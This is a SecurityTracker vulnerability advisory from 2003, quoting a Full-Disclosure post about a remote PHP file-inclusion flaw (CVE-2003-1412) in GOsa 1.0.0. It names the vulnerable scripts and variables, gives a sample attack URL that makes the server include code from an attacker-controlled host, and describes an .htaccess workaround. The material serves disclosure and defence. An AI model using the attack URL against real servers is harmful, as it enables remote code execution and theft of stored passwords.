SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  GOsa Vendors:  Pollmeier, Cajus
GONICUS System Administrator (GOsa) Include File Vulnerability Lets Remote Users Execute Arbitrary PHP Code
SecurityTracker Alert ID:  1006162
SecurityTracker URL:  http://securitytracker.com/id?1006162
CVE Reference:  CVE-2003-1412   (Links to External Site)
Updated:  Jul 7 2008
Original Entry Date:  Feb 24 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.0
Description:  A vulnerability was reported in the GONICUS System Administrator (GOsa). A remote user can inject and execute arbitrary PHP code on the system, including operating system commands.

It is reported that several scripts permit a remote user to modify variables to execute arbitrary code. A remote user can set the 'plugin' variable in the following files to reference a remotely located PHP file that will be included and executed by the target server:

plugins/3fax/1blocklists/index.php
plugins/2administration/6departamentadmin/index.php
plugins/2administration/5terminals/index.php
plugins/2administration/ 4mailinglists/index.php
plugins/2administration/3departaments/index.php
plugins/2administration/2groupd/index.php

A similar flaw reportedly exists in the 'base' variable in the 'include/help.php' script.

According to the report, GOsa does not implement a "register_globals off" feature.
Impact:  A remote user can cause arbitrary PHP code, including shell commands
Solution:  No solution was available at the time of this entry. The author of the report has indicated that, as a temporary solution, you can enable apache .htaccess authentication in all subdirectories that contain .php files exclusively for inclusion.
Vendor URL:  www.gonicus.de/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  <appelast@bsquad.sm.pl>
Message History:   None.

 Source Message Contents
Date:  Sun, 23 Feb 2003 22:17:58 +0100
From:  Karol =?iso-8859-2?Q?Wi=EAsek?= <appelast@bsquad.sm.pl>
Subject:  [Full-Disclosure] GOnicus System Administrator php injection

 

-----BEGIN PGP SIGNED MESSAGE-----

I. BACKGROUND

The GOnicus System Administrator is a PHP based administration tool
for managing accounts/systems in LDAP databases.

Project homepage : http://www.gonicus.de

II. DESCRIPTION

A remote attacker can inject into GOsa arbitrary PHP code 
that executes under the privileges of the underlying web server. 
There are serveral places, where by modifying several variables
attacker could execute arbitrary PHP code. 

By setting plugin variable in following files attacker could
include remote files and execute them as a PHP code :

plugins/3fax/1blocklists/index.php
plugins/2administration/6departamentadmin/index.php
plugins/2administration/5terminals/index.php
plugins/2administration/4mailinglists/index.php
plugins/2administration/3departaments/index.php
plugins/2administration/2groupd/index.php

The same situation exists in include/help.php where we could
set base variable as a remote host and include remote file.


The following is a sample attack URL that would cause 
"target.server" to load include/common.inc from  
"attackers.server".

http://target.server/include/help.php?base=http://attackers.server/

GOsa doesnt' support "register_globals off".

III. ANALYSIS

Remote exploitation allows an attacker to execute arbitrary 
commands and code under the privileges of the web server. This also
opens the door to privilege escalation attacks. Attacker could also
debug httpd child processes and grab secret information like users
system passwords, LDAP passwords.

IV. DETECTION

GOsa version 1.0.0 ( current ) is confirmed vulnerable.

V. Workaround

Temporary solution is to enable apache .htaccess authentication
in all subdirectories containing .php files, which are included, not
accessed directly.

Example .htaccess file

AuthType Basic
AuthName koza
UserAuthFile /dev/null
require valid-user

- -- 
Karol Więsek [appelast-at-bsquad.sm.pl]
http://bsquad.sm.pl/

"Knajpa: miejsce, dokąd się co wieczór chodzi po raz ostatni w
życiu."

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
Comment: Bear Software, LLC,  http://bear-software.freeservers.com

iQCVAwUBPlksdkKKOIVhErCVAQEeaAP+PBSWgy6Dealk+B3nNEmTQnsOzgUUuDd+
KNAapeZmyyzmsHR+BmCAiKLICtau+3OivQbRyhuIjh/I1oXrmFRDSdZVEWaau6c4
peTHhoHaTEbOpn4Wuc0D1axJhaeCboc1syOY3sss/U8cd+jEz7wQgBvWRcbmR02H
VhwGjAjsVm8=
=TYVx
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC